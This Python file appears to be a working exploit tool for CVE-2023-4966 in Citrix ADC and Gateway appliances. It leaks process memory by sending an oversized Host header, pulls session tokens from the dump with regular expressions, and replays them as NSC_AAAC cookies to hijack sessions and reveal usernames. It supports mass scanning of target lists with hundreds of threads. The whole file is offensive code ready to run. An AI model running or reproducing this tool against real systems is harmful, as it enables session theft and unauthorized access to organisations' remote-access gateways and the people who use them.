import re import sys import hexdump import argparse import requests from rich.console import Console from urllib.parse import urlparse from alive_progress import alive_bar from typing import List, Tuple, Optional, TextIO from concurrent.futures import ThreadPoolExecutor, as_completed warnings = requests.packages.urllib3 warnings.disable_warnings(warnings.exceptions.InsecureRequestWarning) class CitrixMemoryDumper: def __init__(self): self.console = Console() self.parser = argparse.ArgumentParser(description='Citrix ADC Memory Dumper') self.setup_arguments() self.results: List[Tuple[str, str]] = [] self.output_file: Optional[TextIO] = None if self.args.output: self.output_file = open(self.args.output, 'w') def setup_arguments(self) -> None: self.parser.add_argument('-u', '--url', help='The Citrix ADC / Gateway target (e.g., https://192.168.1.200)') self.parser.add_argument('-f', '--file', help='File containing a list of target URLs (one URL per line)') self.parser.add_argument('-o', '--output', help='File to save the output results') self.parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose mode') self.parser.add_argument('--only-valid', action='store_true', help='Only show results with valid sessions') self.args = self.parser.parse_args() def print_results(self, header: str, result: str) -> None: if self.args.only_valid and "[+]" not in header: return formatted_msg = f"{header} {result}" self.console.print(formatted_msg, style="white") if self.output_file: self.output_file.write(result + '\n') def normalize_url(self, url: str) -> str: if not url.startswith("http://") and not url.startswith("https://"): url = f"https://{url}" parsed_url = urlparse(url) normalized_url = f"{parsed_url.scheme}://{parsed_url.netloc}" return normalized_url def dump_memory(self, url: str) -> None: full_url = self.normalize_url(url) headers = { "Host": "a" * 24576 } try: r = requests.get( f"{full_url}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False, timeout=10, ) content_bytes = r.content if r.status_code == 200 and content_bytes: if b"\x00"*16 in content_bytes: cleaned_content = self.clean_bytes(content_bytes) for _ in range(10): cleaned_content = cleaned_content.replace(b'a'*65, b'').replace(b'a'*32, b'') content_bytes = content_bytes.replace(b'a'*65, b'').replace(b'a'*32, b'') if self.args.verbose and self.args.url: self.results.append(("[bold blue][*][/bold blue]", f"Memory Dump for {full_url}")) hex_output = hexdump.hexdump(content_bytes, result='return').strip() self.results.extend([("", line) for line in hex_output.splitlines()]) self.results.append(("[bold blue][*][/bold blue]", "End of Dump\n")) session_tokens = self.find_session_tokens(content_bytes) valid_token_found = False for token in session_tokens: if self.test_session_cookie(full_url, token): valid_token_found = True if not valid_token_found: if not self.args.only_valid: if self.args.url: self.results.append(("[bold yellow][!][/bold yellow]", f"Partial memory dump but no valid session token found for {full_url}.")) else: self.results.append(("[bold green][+][/bold green]", f"Vulnerable to CVE-2023-4966. Endpoint: {full_url}, but no valid session token found.")) elif self.args.verbose and self.args.url: self.results.append(("[bold red][-][/bold red]", f"Could not dump memory for {full_url}.")) except Exception as e: if self.args.verbose and self.args.url: self.results.append(("[bold red][-][/bold red]", f"Error processing {full_url}: {str(e)}.")) def clean_bytes(self, data: bytes) -> bytes: return b''.join(bytes([x]) for x in data if 32 <= x <= 126) def find_session_tokens(self, content_bytes: bytes) -> List[str]: TOKEN_65_PATTERN = re.compile(rb'(?=([a-f0-9]{65}))') TOKEN_32_PATTERN = re.compile(rb'(?=([a-f0-9]{32}))') sessions_65 = [match.group(1).decode('utf-8') for match in TOKEN_65_PATTERN.finditer(content_bytes) if match.group(1).endswith(b'45525d5f4f58455e445a4a42') and not match.group(1).startswith(b'a'*65)] sessions_32 = [match.group(1).decode('utf-8') for match in TOKEN_32_PATTERN.finditer(content_bytes) if not match.group(1).startswith(b'a'*32)] combined_sessions = list(dict.fromkeys(sessions_65 + sessions_32)) return combined_sessions def test_session_cookie(self, url: str, session_token: str) -> bool: headers = { "Cookie": f"NSC_AAAC={session_token}" } try: r = requests.post( f"{url}/logon/LogonPoint/Authentication/GetUserName", headers=headers, verify=False, timeout=10, ) if r.text.count('\n') > 0: return False if r.status_code == 200: username = r.text.strip() self.results.append(("[bold green][+][/bold green]", f"Vulnerable to CVE-2023-4966. Endpoint: {url}, Cookie: {session_token}, Username: {username}")) return True else: return False except Exception as e: if self.args.verbose and self.args.url: self.results.append(("[bold red][-][/bold red]", f"Error testing cookie for {url}: {str(e)}.")) return False def run(self) -> None: if self.args.url: self.dump_memory(self.args.url) for header, result in self.results: self.print_results(header, result) elif self.args.file: with open(self.args.file, 'r') as file: urls = file.read().splitlines() with ThreadPoolExecutor(max_workers=300) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar: futures = {executor.submit(self.dump_memory, url): url for url in urls} for future in as_completed(futures): for header, result in self.results: self.print_results(header, result) self.results.clear() bar() else: self.console.print("[bold red][-][/bold red] URL or File must be provided.", style="white") sys.exit(1) if self.output_file: self.output_file.close() if __name__ == "__main__": dumper = CitrixMemoryDumper() dumper.run()